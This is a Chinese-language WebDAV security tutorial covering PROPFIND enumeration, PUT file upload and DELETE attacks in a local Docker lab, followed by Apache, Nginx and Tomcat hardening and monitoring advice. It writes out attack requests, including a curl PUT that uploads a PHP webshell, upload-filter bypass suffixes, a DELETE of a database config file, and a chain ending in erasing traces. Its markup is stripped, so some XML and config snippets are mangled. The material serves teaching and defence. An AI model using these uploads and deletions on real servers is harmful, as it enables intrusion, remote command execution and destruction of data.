WebDAV 方法实战:PROPFIND/PUT/DELETE 3类高危操作复现与修复

📅 2026/7/8 20:27:53
WebDAV 方法实战:PROPFIND/PUT/DELETE 3类高危操作复现与修复
WebDAV 高危操作实战从信息泄露到文件操控的攻防演练WebDAVWeb Distributed Authoring and Versioning作为HTTP协议的扩展为远程协作编辑和管理文件提供了强大支持但同时也带来了不容忽视的安全隐患。本文将深入剖析PROPFIND、PUT和DELETE三类高危操作的攻击面并提供可立即落地的修复方案。1. WebDAV安全风险全景图WebDAV协议扩展了标准HTTP方法集引入了PROPFIND、PROPPATCH、MKCOL、COPY、MOVE、LOCK和UNLOCK等方法。这些方法在设计之初主要考虑功能性需求却忽视了安全控制机制导致攻击者可能通过PROPFIND获取服务器目录结构利用PUT方法上传恶意文件使用DELETE方法破坏关键系统文件组合MOVE/COPY方法绕过安全限制典型攻击链示例1. OPTIONS探测 → 2. PROPFIND信息收集 → 3. PUT上传Webshell → 4. MOVE重命名 → 5. DELETE清除痕迹2. 本地靶场快速搭建使用Docker快速构建包含漏洞的测试环境# 启动存在WebDAV配置缺陷的Apache容器 docker run -d --name vulnerable-dav \ -p 8080:80 \ -v $(pwd)/webdav:/var/www/html \ -e APACHE_DAV_ENABLE1 \ -e APACHE_DAV_ALLOW_ALL1 \ httpd:2.4验证环境是否就绪curl -X OPTIONS http://localhost:8080 -I # 应返回包含DAV头部的响应3. PROPFIND信息泄露实战PROPFIND方法允许客户端检索资源属性攻击者可利用此方法枚举服务器目录结构攻击复现步骤发送PROPFIND请求探测根目录PROPFIND / HTTP/1.1 Host: target.com Depth: 1 Content-Type: application/xml Content-Length: 35 d:propfind xmlns:dDAV:d:allprop//d:propfind解析服务器响应获取文件列表d:multistatus d:response d:href//d:href d:propstat d:prop d:displaynamewebapp/d:displayname d:getlastmodifiedWed, 15 Jun 2023 08:49:37 GMT/d:getlastmodified /d:prop /d:propstat /d:response /d:multistatus风险评级CVSS评分5.3中危影响范围暴露目录结构、备份文件路径、配置文件位置4. PUT文件上传漏洞利用当服务器配置允许PUT方法时攻击者可直接上传任意文件攻击复现# 上传文本文件测试 curl -X PUT http://target.com/uploads/test.txt \ -d This is a test file # 上传PHP Webshell需配合解析漏洞 curl -X PUT http://target.com/uploads/shell.php%00.txt \ -d ?php system($_GET[cmd]); ?绕过技巧使用%20空格后缀shell.php%20使用特殊字符shell.php::$DATA结合MOVE方法先上传无害文件再重命名5. DELETE文件删除攻击DELETE方法允许直接删除服务器资源可能造成服务中断攻击示例DELETE /config/database.ini HTTP/1.1 Host: target.com防御难点缺乏操作审计日志无回收站机制可能被用于擦除入侵痕迹6. 多维度修复方案Apache配置加固# 禁用危险方法 Location / LimitExcept GET POST HEAD Require all denied /LimitExcept # 关闭WebDAV Dav off # 禁用目录列表 Options -Indexes /LocationNginx防护配置location / { if ($request_method !~ ^(GET|HEAD|POST)$ ) { return 405; } # 禁用自动目录索引 autoindex off; # 限制上传文件类型 client_max_body_size 1M; }Tomcat安全设置!-- conf/web.xml -- security-constraint web-resource-collection url-pattern/*/url-pattern http-methodPUT/http-method http-methodDELETE/http-method http-methodPROPFIND/http-method /web-resource-collection auth-constraint / /security-constraint7. 深度防御策略监控与检测实时告警非常规HTTP方法请求记录完整的WebDAV操作日志部署WAF规则拦截恶意PROPFIND请求架构优化客户端 → 反向代理方法过滤 → 应用服务器禁用WebDAV → 文件存储权限隔离应急响应检查清单审查服务器OPTIONS响应头扫描Web目录下异常文件检查最近修改时间的配置文件分析Web日志中的PROPFIND/PUT请求在实际渗透测试中WebDAV漏洞往往与其他安全问题形成组合攻击。建议定期使用自动化工具扫描同时结合人工验证确保修复措施生效。